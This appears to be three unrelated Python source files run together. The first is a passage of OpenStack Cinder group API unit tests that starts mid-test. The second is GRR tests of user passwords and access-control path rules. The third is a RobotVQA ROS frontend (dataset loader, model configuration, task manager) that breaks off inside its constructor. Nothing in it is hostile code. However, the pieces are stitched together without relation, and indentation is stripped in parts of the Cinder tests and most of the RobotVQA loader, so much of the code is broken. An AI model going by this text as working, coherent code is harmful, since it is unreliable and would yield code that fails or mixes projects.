group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.create_from_src,
self.ctxt, 'group', 'desc',
group_snapshot_id=None, source_group_id=group.id)
    @mock.patch('cinder.objects.volume.Volume.host',
                new_callable=mock.PropertyMock)
    @mock.patch('cinder.objects.volume.Volume.cluster_name',
                new_callable=mock.PropertyMock)
    @mock.patch('cinder.objects.VolumeList.get_all_by_generic_group')
    def test_update_volumes_host(self, mock_volume_get_all, mock_cluster_name,
                                 mock_host):
        """_update_volumes_host copies the group's host and cluster onto
        every member volume and saves each one.
        """
        vol_type = utils.create_volume_type(self.ctxt, name='test_vol_type')
        grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[vol_type['id']],
                                 availability_zone='nova',
                                 status=fields.GroupStatus.CREATING,
                                 cluster_name='fake_cluster')
        vol1 = utils.create_volume(
            self.ctxt,
            availability_zone=grp.availability_zone,
            volume_type_id=fake.VOLUME_TYPE_ID,
            group_id=grp.id)
        # A Mock volume stands in for the group's member list so that the
        # attribute assignments can be asserted below.
        mock_volume = mock.Mock()
        mock_volume_get_all.return_value = [mock_volume]
        group_api = cinder.group.api.API()
        group_api._update_volumes_host(None, grp)
        mock_cluster_name.assert_called()
        mock_host.assert_called()
        self.assertEqual(grp.host, mock_volume.host)
        self.assertEqual(grp.cluster_name, mock_volume.cluster_name)
        mock_volume.save.assert_called_once_with()
        vol1.destroy()
        grp.destroy()
def test_delete_group_frozen(self):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.delete, self.ctxt, group)
def test_create_group_snapshot_frozen(self):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.create_group_snapshot,
self.ctxt, group, 'group_snapshot', 'desc')
def test_delete_group_snapshot_frozen(self):
service = utils.create_service(self.ctxt, {'frozen': True})
group = utils.create_group(self.ctxt, host=service.host,
group_type_id='gt')
gsnap = utils.create_group_snapshot(self.ctxt, group.id)
group_api = cinder.group.api.API()
self.assertRaises(exception.InvalidInput,
group_api.delete_group_snapshot,
self.ctxt, gsnap)
    @mock.patch('cinder.volume.volume_types.get_volume_type_qos_specs',
                return_value={'qos_specs': {}})
    @mock.patch('cinder.scheduler.rpcapi.SchedulerAPI.create_group')
    def test_cast_create_group(self,
                               mock_create_group,
                               mock_get_volume_type_qos_specs):
        """_cast_create_group augments the request and group specs with
        volume properties and qos, then forwards them to the scheduler.
        """
        vol_type = utils.create_volume_type(self.ctxt, name='test_vol_type')
        encryption_key_id = mock.sentinel.encryption_key_id
        description = mock.sentinel.description
        name = mock.sentinel.name
        req_spec = {'volume_type': vol_type,
                    'encryption_key_id': encryption_key_id,
                    'description': description,
                    'name': name}
        grp_name = "test_group"
        grp_description = "this is a test group"
        grp_spec = {'name': grp_name,
                    'description': grp_description}
        grp = utils.create_group(self.ctxt,
                                 group_type_id=fake.GROUP_TYPE_ID,
                                 volume_type_ids=[vol_type.id],
                                 availability_zone='nova')
        grp_filter_properties = mock.sentinel.group_filter_properties
        filter_properties_list = mock.sentinel.filter_properties_list
        self.group_api._cast_create_group(self.ctxt,
                                          grp,
                                          grp_spec,
                                          [req_spec],
                                          grp_filter_properties,
                                          filter_properties_list)
        mock_get_volume_type_qos_specs.assert_called_once_with(vol_type.id)
        # Volume-level properties expected to be merged into the req spec.
        exp_vol_properties = {
            'size': 0,
            'user_id': self.ctxt.user_id,
            'project_id': self.ctxt.project_id,
            'status': 'creating',
            'attach_status': 'detached',
            'encryption_key_id': encryption_key_id,
            'display_description': description,
            'display_name': name,
            'volume_type_id': vol_type.id,
            'group_type_id': grp.group_type_id,
            'availability_zone': grp.availability_zone
        }
        exp_req_spec = {
            'volume_type': vol_type,
            'encryption_key_id': encryption_key_id,
            'description': description,
            'name': name,
            'volume_properties': exp_vol_properties,
            'qos_specs': None
        }
        # Group-level properties expected to be merged into the group spec.
        exp_grp_properties = {
            'size': 0,
            'user_id': self.ctxt.user_id,
            'project_id': self.ctxt.project_id,
            'status': 'creating',
            'display_description': grp_description,
            'display_name': grp_name,
            'group_type_id': grp.group_type_id,
        }
        exp_grp_spec = {
            'name': grp_name,
            'description': grp_description,
            'volume_properties': exp_grp_properties,
            'qos_specs': None
        }
        mock_create_group.assert_called_once_with(
            self.ctxt,
            grp,
            group_spec=exp_grp_spec,
            request_spec_list=[exp_req_spec],
            group_filter_properties=grp_filter_properties,
            filter_properties_list=filter_properties_list)
| |
#!/usr/bin/env python
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib.aff4_objects import user_managers
class GRRUserTest(test_lib.AFF4ObjectTest):
  """Tests for the GRRUser AFF4 object."""

  def testUserPasswords(self):
    """A stored password verifies and wrong guesses are rejected."""
    with aff4.FACTORY.Create("aff4:/users/test", "GRRUser",
                             token=self.token) as grr_user:
      grr_user.SetPassword("hello")
    reopened = aff4.FACTORY.Open(grr_user.urn, token=self.token)
    self.assertTrue(reopened.CheckPassword("hello"))
    self.assertFalse(reopened.CheckPassword("goodbye"))

  def testLabels(self):
    """Labels set on a user are returned by GetLabelsNames."""
    with aff4.FACTORY.Create("aff4:/users/test", "GRRUser",
                             token=self.token) as grr_user:
      grr_user.SetLabels("hello", "world", owner="GRR")
    reopened = aff4.FACTORY.Open(grr_user.urn, token=self.token)
    self.assertListEqual(["hello", "world"], reopened.GetLabelsNames())
class CheckAccessHelperTest(test_lib.AFF4ObjectTest):
  """Tests for CheckAccessHelper and the FullAccessControlManager."""
  def setUp(self):
    super(CheckAccessHelperTest, self).setUp()
    self.helper = user_managers.CheckAccessHelper("test")
    self.subject = rdfvalue.RDFURN("aff4:/some/path")
  def testReturnsFalseByDefault(self):
    """With no rules configured, access checks raise UnauthorizedAccess."""
    self.assertRaises(access_control.UnauthorizedAccess,
                      self.helper.CheckAccess, self.subject, self.token)
  def testReturnsFalseOnFailedMatch(self):
    """A rule for a different path does not authorize the subject."""
    self.helper.Allow("aff4:/some/otherpath")
    self.assertRaises(access_control.UnauthorizedAccess,
                      self.helper.CheckAccess, self.subject, self.token)
  def testReturnsTrueOnMatch(self):
    """An exact-path rule authorizes the subject."""
    self.helper.Allow("aff4:/some/path")
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
  def testReturnsTrueIfOneMatchFails1(self):
    """A non-matching rule registered first does not block a later match."""
    self.helper.Allow("aff4:/some/otherpath")
    self.helper.Allow("aff4:/some/path")
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
  def testReturnsTrueIfOneMatchFails2(self):
    """Registration order is irrelevant: the matching rule may come first."""
    self.helper.Allow("aff4:/some/path")
    self.helper.Allow("aff4:/some/otherpath")
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
  def testFnmatchFormatIsUsedByDefault1(self):
    """Allow() patterns use fnmatch syntax: '*' matches path children."""
    self.helper.Allow("aff4:/some/*")
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
  def testFnmatchFormatIsUsedByDefault2(self):
    """fnmatch '*' also matches across the remainder of the string."""
    self.helper.Allow("aff4:/some*")
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
  def testFnmatchPatternCorrectlyMatchesFilesBelowDirectory(self):
    """'aff4:/some/*' matches children but not 'aff4:/some' itself."""
    self.helper.Allow("aff4:/some/*")
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
    self.assertRaises(access_control.UnauthorizedAccess,
                      self.helper.CheckAccess,
                      rdfvalue.RDFURN("aff4:/some"), self.token)
  def testCustomCheckWorksCorrectly(self):
    """A custom check returning True grants access for a matching rule."""
    def CustomCheck(unused_subject, unused_token):
      return True
    self.helper.Allow("aff4:/some/path", CustomCheck)
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
  def testCustomCheckFailsCorrectly(self):
    """A custom check raising UnauthorizedAccess denies access."""
    def CustomCheck(unused_subject, unused_token):
      raise access_control.UnauthorizedAccess("Problem")
    self.helper.Allow("aff4:/some/path", CustomCheck)
    self.assertRaises(access_control.UnauthorizedAccess,
                      self.helper.CheckAccess, self.subject, self.token)
  def testCustomCheckAcceptsAdditionalArguments(self):
    """Extra Allow() arguments are forwarded to the custom check."""
    def CustomCheck(subject, unused_token, another_subject):
      if subject == another_subject:
        return True
      else:
        raise access_control.UnauthorizedAccess("Problem")
    # self.subject is passed through as ``another_subject``.
    self.helper.Allow("aff4:/*", CustomCheck, self.subject)
    self.assertRaises(access_control.UnauthorizedAccess,
                      self.helper.CheckAccess,
                      rdfvalue.RDFURN("aff4:/some/other/path"),
                      self.token)
    self.assertTrue(self.helper.CheckAccess(self.subject, self.token))
  def Ok(self, subject, access="r"):
    # Helper: assert the access manager grants `access` on `subject`.
    self.assertTrue(
        self.access_manager.CheckDataStoreAccess(self.token, [subject], access))
  def NotOk(self, subject, access="r"):
    # Helper: assert the access manager denies `access` on `subject`.
    self.assertRaises(
        access_control.UnauthorizedAccess,
        self.access_manager.CheckDataStoreAccess,
        self.token, [subject], access)
  def testReadSomePaths(self):
    """Tests some real world paths."""
    self.access_manager = user_managers.FullAccessControlManager()
    access = "r"
    self.Ok("aff4:/", access)
    self.Ok("aff4:/users", access)
    self.NotOk("aff4:/users/randomuser", access)
    self.Ok("aff4:/blobs", access)
    self.Ok("aff4:/blobs/12345678", access)
    self.Ok("aff4:/FP", access)
    self.Ok("aff4:/FP/12345678", access)
    self.Ok("aff4:/files", access)
    self.Ok("aff4:/files/12345678", access)
    self.Ok("aff4:/ACL", access)
    self.Ok("aff4:/ACL/randomuser", access)
    self.Ok("aff4:/stats", access)
    self.Ok("aff4:/stats/FileStoreStats", access)
    self.Ok("aff4:/config", access)
    self.Ok("aff4:/config/drivers", access)
    self.Ok("aff4:/config/drivers/windows/memory/winpmem.amd64.sys", access)
    self.Ok("aff4:/flows", access)
    self.Ok("aff4:/flows/F:12345678", access)
    self.Ok("aff4:/hunts", access)
    self.Ok("aff4:/hunts/H:12345678/C.1234567890123456", access)
    self.Ok("aff4:/hunts/H:12345678/C.1234567890123456/F:AAAAAAAA", access)
    self.Ok("aff4:/cron", access)
    self.Ok("aff4:/cron/OSBreakDown", access)
    self.Ok("aff4:/crashes", access)
    self.Ok("aff4:/crashes/Stream", access)
    self.Ok("aff4:/audit", access)
    self.Ok("aff4:/audit/log", access)
    self.Ok("aff4:/audit/logs", access)
    self.Ok("aff4:/C.0000000000000001", access)
    self.NotOk("aff4:/C.0000000000000001/fs/os", access)
    self.NotOk("aff4:/C.0000000000000001/flows/F:12345678", access)
    self.Ok("aff4:/tmp", access)
    self.Ok("aff4:/tmp/C8FAFC0F", access)
  def testQuerySomePaths(self):
    """Tests some real world paths."""
    self.access_manager = user_managers.FullAccessControlManager()
    access = "rq"
    self.NotOk("aff4:/", access)
    self.NotOk("aff4:/users", access)
    self.NotOk("aff4:/users/randomuser", access)
    self.NotOk("aff4:/blobs", access)
    self.NotOk("aff4:/FP", access)
    self.NotOk("aff4:/files", access)
    self.Ok("aff4:/files/hash/generic/sha256/" + "a" * 64, access)
    self.Ok("aff4:/ACL", access)
    self.Ok("aff4:/ACL/randomuser", access)
    self.NotOk("aff4:/stats", access)
    self.Ok("aff4:/config", access)
    self.Ok("aff4:/config/drivers", access)
    self.Ok("aff4:/config/drivers/windows/memory/winpmem.amd64.sys", access)
    self.NotOk("aff4:/flows", access)
    self.Ok("aff4:/flows/W:12345678", access)
    self.Ok("aff4:/hunts", access)
    self.Ok("aff4:/hunts/H:12345678/C.1234567890123456", access)
    self.Ok("aff4:/hunts/H:12345678/C.1234567890123456/F:AAAAAAAA", access)
    self.Ok("aff4:/cron", access)
    self.Ok("aff4:/cron/OSBreakDown", access)
    self.NotOk("aff4:/crashes", access)
    self.NotOk("aff4:/audit", access)
    self.Ok("aff4:/audit/logs", access)
    self.Ok("aff4:/C.0000000000000001", access)
    self.NotOk("aff4:/C.0000000000000001/fs/os", access)
    self.NotOk("aff4:/C.0000000000000001/flows", access)
    self.NotOk("aff4:/tmp", access)
| |
#!/usr/bin/env python
"""
#@Author: Frankln Kenghagho
#@Date: 04.04.2019
#@Project: RobotVA
"""
#This program is the frontend and performs several tasks, namely:
# 1- Setting of model paths
# 2- Setting of model hyperparameters
# 3- Data preparation and loading into memory
# 4- Training
# 5- Inference
# 6- Validation
# 7- Testing
# 8- Result visualization
#setting python paths
import sys
import os
import roslib
import rospkg
rospack = rospkg.RosPack()
packname=''
packname=rospack.get_path('robotvqa_visualizer')
sys.path.append(os.path.join(packname,'../models'))
sys.path.append(os.path.join(packname,'../tools'))
import visualize
from visualize import get_ax
import pickle
import glob
import random
import math
import re
import time
import numpy as np
import cv2
import mutex
import rospy
from PIL import Image
from std_msgs.msg import( String )
import cv_bridge
from sensor_msgs.msg import Image
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge
from DatasetClasses import DatasetClasses
from robotVQAConfig import RobotVQAConfig
import utils
import skimage
import json
#Select a GPU if working on Multi-GPU Systems
#Several GPUs can also be selected
#os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
#os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import glob
from keras import backend as K
import robotVQA as modellib
#Scene Graph Server
from rs_robotvqa_msgs.srv import *
################# Extended DatasetLoader Class(EDLC) ###################
class ExtendedDatasetLoader(utils.Dataset):
"""Extend the generic Dataset class and override the following methods:
load_mask()
"""
def __init__(self):
super(self.__class__,self).__init__()
def normalize(self,s):
"""Capitalize first letter of string s
"""
s=s.rstrip().lstrip()
return s[0].upper()+s[1:]
def register_images(self,folders,imgNameRoot,annotNameRoot,depthNameRoot,config,with_depth=True,high_depth=True):
"""get all image files that pass the filter
inputs:
mode: how to build the dataset: from a dataset file(file) or from a raw dataset(data) made up of images and annotations
For a quick access to large dataset, the latter is preloaded into a binary file
"""
classes=[[],[],[],[],[]]#for 5 output_features
nbfails=0
nbsuccess=0
for folder in folders:
annotation_filter=folder+'/'+annotNameRoot+'*.json'
annotations=glob.glob(annotation_filter)
#Add classes
rospy.loginfo('\nLoading classes from dataset ...\n')
for anot in annotations:
try:
with open(anot,'r') as infile:
jsonImage=json.load(infile)
infile.close()
for obj in jsonImage['objects']:
try:
cat=self.normalize(obj['objectName'])
col=self.normalize(obj['objectColor'])
sha=self.normalize(obj['objectShape'])
mat=self.normalize(obj['objectExternMaterial'])
opn=self.normalize(obj['objectOpenability'])
opn=self.normalize(config.OBJECT_OPENABILITY_DICO[opn])
if((cat in config.OBJECT_NAME_DICO) and (col in config.OBJECT_COLOR_DICO) and (sha in config.OBJECT_SHAPE_DICO) and \
(mat in config.OBJECT_MATERIAL_DICO) and (opn in list(config.OBJECT_OPENABILITY_DICO.values()))):
if cat not in classes[0]:
classes[0].append(cat)
if col not in classes[1]:
classes[1].append(col)
if sha not in classes[2]:
classes[2].append(sha)
if mat not in classes[3]:
classes[3].append(mat)
if opn not in classes[4]:
classes[4].append(opn)
nbsuccess+=1
except Exception as e:
rospy.logwarn('Data '+str(anot)+': An object could not be processed:'+str(e))
nbfails+=1
except Exception as e:
rospy.logwarn('Data '+str(anot)+' could not be processed:'+str(e))
nbfails+=1
rospy.loginfo('\n',nbsuccess,' Objects successfully found and ',nbfails,' Objects failed!', '\n')
rospy.loginfo('\nClasses found:',classes, '\n')
rospy.loginfo('\nRegistering classes ...\n')
for feature_id in range(config.NUM_FEATURES-2):
for i in range(len(classes[feature_id])):
self.add_class(feature_id,"robotVQA",i+1,classes[feature_id][i])
rospy.loginfo('\nAdding object relationships ...\n')
#Add relationships
feature_id=5
for i in range(config.NUM_CLASSES[feature_id]-1):
self.add_class(feature_id,"robotVQA",i+1,self.normalize(list(config.OBJECT_RELATION_DICO.keys())[i]))
rospy.loginfo('\nAdding relationship categories ...\n')
#Add relationship categories
feature_id=6
for i in range(config.NUM_CLASSES[feature_id]-1):
self.add_class(feature_id,"robotVQA",i+1,self.normalize(list(config.RELATION_CATEGORY_DICO.values())[i]))
rospy.loginfo('\nAdding images ...\n')
k=-1
for folder in folders:
image_filter=folder+'/'+imgNameRoot+'*.*'
images=glob.glob(image_filter)
#Add images
for i in range(len(images)):
k+=1
index=images[i].split(imgNameRoot)[1].split('.')[0]
annotationPath=folder+'/'+annotNameRoot+index+'.json'
if high_depth:
depthPath=folder+'/'+depthNameRoot+index+'.exr'
else:
depthPath=folder+'/'+depthNameRoot+index+'.jpg'
try:
image = skimage.io.imread(images[i])
if (os.path.exists(depthPath) or (not with_depth) ) and os.path.exists(annotationPath):
self.add_image("robotVQA",k,images[i],depthPath=depthPath,annotPath=annotationPath,dataFolder=folder,shape=image.shape)
except Exception as e:
rospy.logerr('Image '+str(images[i])+' could not be registered:'+str(e))
rospy.loginfo('\nImages found in'+folder+':',len(images), '\n')
del classes[:]
def reduce_relation(self,relation):
x=np.count_nonzero(relation,axis=2)
x=np.count_nonzero(x,axis=0)+np.count_nonzero(x,axis=1)
return x.nonzero()
def make_transition(self,relation):
N,C=relation.shape[1:]
for c in range(C):
stable=False
while not stable:
stable=True
for i in range(N):
for j in range(N):
for k in range(N):
if(relation[i][j][c]==relation[j][k][c] and relation[i][j][c]!=0 and relation[i][j][c]!=relation[i][k][c]):
relation[i][k][c]=relation[i][j][c]
stable=False
return relation
def load_mask(self, image_id,config):
"""Generate instance masks for objects of the given image ID.
"""
info = self.image_info[image_id]
annotationPath = info['annotPath']
shape=info['shape']
shape=[shape[0],shape[1]]
mask=[]
pose=[]
nbfail=0
nbsuccess=0
classes=[[],[],[],[],[]]
id_name_map=[]
try:
with open(annotationPath,'r') as infile:
jsonImage=json.load(infile)
infile.close()
img=np.zeros(shape,dtype='uint8')
for obj in jsonImage['objects']:
try:
cat=self.normalize(obj['objectName'])
col=self.normalize(obj['objectColor'])
sha=self.normalize(obj['objectShape'])
mat=self.normalize(obj['objectExternMaterial'])
opn=self.normalize(obj['objectOpenability'])
ori=np.array(obj['objectLocalOrientation'],dtype='float32')
#normalize angles to principal ones
ori[0]=utils.principal_angle(ori[0])
ori[1]=utils.principal_angle(ori[1])
ori[2]=utils.principal_angle(ori[2])
pos=np.array(obj['objectLocalPosition'],dtype='float32')
opn=self.normalize(config.OBJECT_OPENABILITY_DICO[opn])
#check that objects are defined in the right bound
assert abs(pos[0])<=config.MAX_OBJECT_COORDINATE and \
abs(pos[1])<=config.MAX_OBJECT_COORDINATE and \
abs(pos[2])<=config.MAX_OBJECT_COORDINATE
if((cat in config.OBJECT_NAME_DICO) and (col in config.OBJECT_COLOR_DICO) and (sha in config.OBJECT_SHAPE_DICO) and \
(mat in config.OBJECT_MATERIAL_DICO) and (opn in list(config.OBJECT_OPENABILITY_DICO.values()))):
id_name_map.append(obj['objectId'])
classes[0].append(cat)
classes[1].append(col)
classes[2].append(sha)
classes[3].append(mat)
classes[4].append(opn)
img=img*0
for cord in obj['objectSegmentationPixels']:
img[cord[0]][cord[1]]=1
mask.append(img.copy())
#register poses with normalization
pose.append(np.array(list(ori)+list(utils.getPositionFromCamToImg(pos)),dtype='float32'))
nbsuccess+=1
except Exception as e:
nbfail+=1
rospy.loginfo('\n\n',nbsuccess,'/',nbsuccess+nbfail,' Object(s) found!')
nbInstances=len(mask)
shape.append(nbInstances)
rospy.loginfo('\nShape:\n',shape)
masks=np.zeros(shape,dtype='uint8')
poses=np.zeros([nbInstances,6],dtype='float32')
relations=np.zeros([nbInstances,nbInstances,DatasetClasses.NUM_CLASSES[6]-1],dtype='int32')
for i in range(nbInstances):
masks[:,:,i]=mask[i].copy()
poses[i,:]=pose[i].copy()
del mask[:]
del pose[:]
for j in range(len(classes)):
for i in range(len(classes[j])):
classes[j][i]=self.class_names[j].index(classes[j][i])
classes[j]=np.array(classes[j],dtype='int32')
for rel in jsonImage['objectRelationship']:
try:
if(rel['object1'] in id_name_map) and (rel['object2'] in id_name_map):
relations[id_name_map.index(rel['object1'])][id_name_map.index(rel['object2'])][self.class_names[6].index(config.OBJECT_RELATION_DICO[self.normalize(rel['relation'])])-1]=self.class_names[5].index(self.normalize(rel['relation']))
except Exception as e:
rospy.logerr('An object relationship could not be processed: '+str(e))
del id_name_map[:]
#Further processing if there are relations
if relations.sum()!=0.:
#augment dataset through transitivity property of relations
#relations=self.make_transition(relations)
#only select objects participating in a relationship
valid_obj=self.reduce_relation(relations)
#take away all non valid objects masks,poses,...
relations=relations.take(valid_obj[0],axis=1).take(valid_obj[0],axis=0)
masks=masks.take(valid_obj[0],axis=2)
poses=poses.take(valid_obj[0],axis=0)
for i in range(len(classes)):
classes[i]=classes[i].take(valid_obj[0],axis=0)
#merge all relation categories into a single one
z=np.where(relations[:,:,2]>0)
relations[:,:,1][z]=(relations[:,:,2][z])
z=np.where(relations[:,:,1]>0)
relations[:,:,0][z]=(relations[:,:,1][z])
return masks,classes,poses,relations[:,:,0]
except Exception as e:
rospy.logerr('\n\n Data '+str(annotationPath)+' could not be processed:'+str(e))
return super(self.__class__,self).load_mask(image_id)
################ EXtended Model Configuration Class(EMCC)##############
class ExtendedRobotVQAConfig(RobotVQAConfig):
    """Configuration for training on the specific robotVQA dataset.

    Derives from the base Config class and overrides values specific
    to the robotVQA dataset.  Most dataset-dependent constants are
    re-exported here from DatasetClasses so the model only ever reads
    its configuration object.
    """
    # Give the configuration a recognizable name
    NAME = "robotVQA"
    # Train on 1 GPU and 1 image per GPU. We can put multiple images on each
    # GPU because the images are small. Batch size is 1 (GPUs * images/GPU).
    GPU_COUNT = 1
    IMAGES_PER_GPU = 1
    # Number of target features
    NUM_FEATURES=DatasetClasses.NUM_FEATURES
    # Target features
    FEATURES_INDEX=DatasetClasses.FEATURES_INDEX
    # Number of classes per feature (object's category/name, color, shape,
    # material, openability), including background
    NUM_CLASSES =DatasetClasses.NUM_CLASSES
    # categories
    OBJECT_NAME_DICO=DatasetClasses.OBJECT_NAME_DICO
    # colors
    OBJECT_COLOR_DICO=DatasetClasses.OBJECT_COLOR_DICO
    # shapes
    OBJECT_SHAPE_DICO=DatasetClasses.OBJECT_SHAPE_DICO
    # materials
    OBJECT_MATERIAL_DICO=DatasetClasses.OBJECT_MATERIAL_DICO
    # openability
    OBJECT_OPENABILITY_DICO=DatasetClasses.OBJECT_OPENABILITY_DICO
    # object relationships
    OBJECT_RELATION_DICO=DatasetClasses.OBJECT_RELATION_DICO
    # relationship categories
    RELATION_CATEGORY_DICO=DatasetClasses.RELATION_CATEGORY_DICO
    # Max object coordinate in cm
    MAX_OBJECT_COORDINATE=DatasetClasses.MAX_OBJECT_COORDINATE
    # Max camera-center-to-pixel distance in m, used for discarding useless
    # objects (not in the system's focus: reduces the scope of view)
    MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE=DatasetClasses.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE
    # Learning rate and momentum
    # The Mask RCNN paper uses lr=0.02, but on TensorFlow it causes
    # weights to explode. Likely due to differences in optimizer
    # implementation.
    LEARNING_RATE = 0.001
    LEARNING_MOMENTUM = 0.9
    # Weight decay regularization
    WEIGHT_DECAY = 0.000001
    # Use small images for faster training. Set the limits of the small side
    # the large side, and that determines the image shape.
    IMAGE_MIN_DIM = DatasetClasses.IMAGE_MIN_DIM
    IMAGE_MAX_DIM = DatasetClasses.IMAGE_MAX_DIM
    # Use smaller anchors because our image and objects are small
    RPN_ANCHOR_SCALES = (16, 32, 64, 128,256)  # anchor side in pixels
    # Reduce training ROIs per image because the images are small and have
    # few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
    TRAIN_ROIS_PER_IMAGE =20
    # Maximum number of ground truth instances to use in one image
    MAX_GT_INSTANCES = 20
    # Max number of final detections
    DETECTION_MAX_INSTANCES = 20
    # ROIs kept after non-maximum suppression (training and inference)
    POST_NMS_ROIS_TRAINING = 2000
    POST_NMS_ROIS_INFERENCE = 1000
    # Use a small epoch since the data is simple
    STEPS_PER_EPOCH = 10
    # Number of epochs
    NUM_EPOCHS=1000
    # use small validation steps since the epoch is small
    VALIDATION_STEPS = 500
    # Learning-rate controller coefficients
    REL_ALPHA1=0.9999
    REL_ALPHA2=0.0001
    # Use RPN ROIs or externally generated ROIs for training
    # Keep this True for most situations. Set to False if you want to train
    # the head branches on ROI generated by code rather than the ROIs from
    # the RPN. For example, to debug the classifier head without having to
    # train the RPN.
    USE_RPN_ROIS = True
    # Non-max suppression threshold to filter RPN proposals.
    # You can reduce this during training to generate more proposals.
    RPN_NMS_THRESHOLD = 0.6
    # Non-maximum suppression threshold for detection
    DETECTION_NMS_THRESHOLD = 0.3
    # Input image size: RGBD images
    IMAGE_SHAPE = [DatasetClasses.IMAGE_MAX_DIM, DatasetClasses.IMAGE_MAX_DIM, DatasetClasses.IMAGE_MAX_CHANNEL]
    # Object poses' boundaries for normalizing objects' poses
    # poses are normalized to [0,1[
    MAX_OBJECT_POSES=DatasetClasses.MAX_OBJECT_POSES
    # Object orientation normalization factor. Angles belong to [0,2pi[
    # Angles are normalized to [0,1[
    ANGLE_NORMALIZED_FACTOR=DatasetClasses.ANGLE_NORMALIZED_FACTOR
    # Image mean (RGB)
    MEAN_PIXEL = DatasetClasses.MEAN_PIXEL
    # With depth information?
    WITH_DEPTH_INFORMATION=False
    # processor's names
    GPU0='/gpu:0'
    GPU1='/gpu:1'
    GPU2='/gpu:2'
    GPU3='/gpu:3'
    CPU0='/cpu:0'
    # Numbers of threads
    NUMBER_THREADS=14
    # Layers to exclude on very first training with a new weights file
    EXCLUDE=None
    # NOTE(review): the bare string below is intentionally dead code — an
    # alternative EXCLUDE list kept for reference, disabled by quoting.
    """
    EXCLUDE=["robotvqa_class_logits0", "robotvqa_class_logits1","robotvqa_class_logits2","robotvqa_class_logits3","robotvqa_class_logits4",
             "robotvqa_class_logits5_1",'robotvqa_class_logits5_2','robotvqa_class_bn2','robotvqa_class_conv2',
             "mrcnn_bbox_fc","mrcnn_bbox","robotvqa_poses_fc", "robotvqa_poses",
             "robotvqa_poses_fc0","robotvqa_poses_fc1","robotvqa_poses_fc2",
             "mrcnn_mask","robotvqa_class0","robotvqa_class1","robotvqa_class2","robotvqa_class3","robotvqa_class4","robotvqa_class5"]
    """
################ Task Manager Class(TMC)##############
class TaskManager(object):
    """ROS front-end for RobotVQA.

    Starts the 'robotvqa' node, loads the trained RobotVQA model, then
    answers scene-graph queries synchronously (the get_scene_graph service)
    and asynchronously (an image-topic subscriber that refreshes the
    display image).  Shared image buffers are protected by spin-locks
    built on the Python 2 'mutex' module.
    """
    ###################################################################
    def __init__(self):
        # The whole constructor is wrapped in try/except: the node cannot
        # run without its model, so any failure exits the process.
        try:
            #Ros Node
            rospy.init_node('robotvqa')
            rospy.loginfo('Starting Ros Node RobotVQA ...')
            rospy.on_shutdown(self.cleanup)
            # temp files used to exchange rendered images with the visualizer
            self.TempImageFile=rospy.get_param('sharedImageFile','TempImageFile.jpg')
            self.TempImageFile1=rospy.get_param('sharedImageFile1','TempImageFile1.jpg')
            self.mainTempImageFile=rospy.get_param('sharedmainImageFile','mainTempImageFile.jpg')
            #attributes
            self.cvImageBuffer=[]
            self.INDEX=-1
            self.INSTANCEINDEX=0
            # cv_bridge encoding depends on where the video stream comes from
            if rospy.get_param('videomode','local')=='local':
                self.cvMode='rgb8'
            else:
                self.cvMode='bgr8'
            self.wait=True
            # NOTE(review): 'mutex' is a Python-2-only module (removed in
            # Python 3); these locks are spun on via testandset() below.
            self.mutex=mutex.mutex()
            self.mutex2=mutex.mutex()
            self.mutex3=mutex.mutex()
            self.mutex4=mutex.mutex()
            self.total=0
            # only every self.frequency-th frame from the topic is processed
            self.frequency=30
            self.counter=0
            self.success=0
            self.currentImage1=[] #current image: Server
            self.currentImage =[] #current image: Pervasive
            # input (camera) and output (display) resolutions
            self.iheight=rospy.get_param('input_height',480)
            self.iwidth=rospy.get_param('input_width',640)
            self.height=rospy.get_param('output_height',1000)
            self.width=rospy.get_param('output_width',1000)
            self.color_hint=rospy.get_param('color_hint',"")
            self.server_name=rospy.get_param('server_name',"/get_scene_graph")
            self.model=None
            # maps the color_hint parameter to the matching ROS message type
            self.color_hints={"":Image, "Compressed":CompressedImage, "raw":Image, "Raw":Image, "compressed":CompressedImage}
            self.bridge = CvBridge()
            rospy.logwarn('RobotVQA initialized!!!')
            # Root directory of the project
            self.ROOT_DIR = rospy.get_param('root_dir',os.path.join(packname,'../../RobotVQA'))
            # Directory to save logs and trained model
            self.MODEL_DIR = rospy.get_param('model_dir',os.path.join(self.ROOT_DIR, 'logs1'))
            # Local path to trained weights file
            self.ROBOTVQA_WEIGHTS_PATH = rospy.get_param('weight_path',os.path.join(self.ROOT_DIR,"mask_rcnn_coco.h5"))
            self.config = ExtendedRobotVQAConfig()#Model config
            if not os.path.exists(self.ROBOTVQA_WEIGHTS_PATH):
                rospy.loginfo('\nThe weight path '+str(self.ROBOTVQA_WEIGHTS_PATH)+' does not exists!!!\n')
            rospy.loginfo('Root directory:'+str(self.ROOT_DIR) )
            rospy.loginfo('Model directory:'+str(self.MODEL_DIR) )
            rospy.loginfo('Weight path:'+str(self.ROBOTVQA_WEIGHTS_PATH))
            self.config.display()
            #load the training set's cartography
            rospy.loginfo('Getting Dataset ...')
            binary_dataset_path=rospy.get_param('binary_dataset_path',os.path.join(self.ROOT_DIR,'dataset/virtual_training_dataset(51000_Images).data'))
            self.train_set=self.getDataset(binary_dataset=binary_dataset_path)
            #result_path: Where should the output of RobotVQA be saved?
            self.result_path=rospy.get_param('result_path',self.ROOT_DIR+'/result')
            rospy.loginfo('Starting RobotVQA core ...')
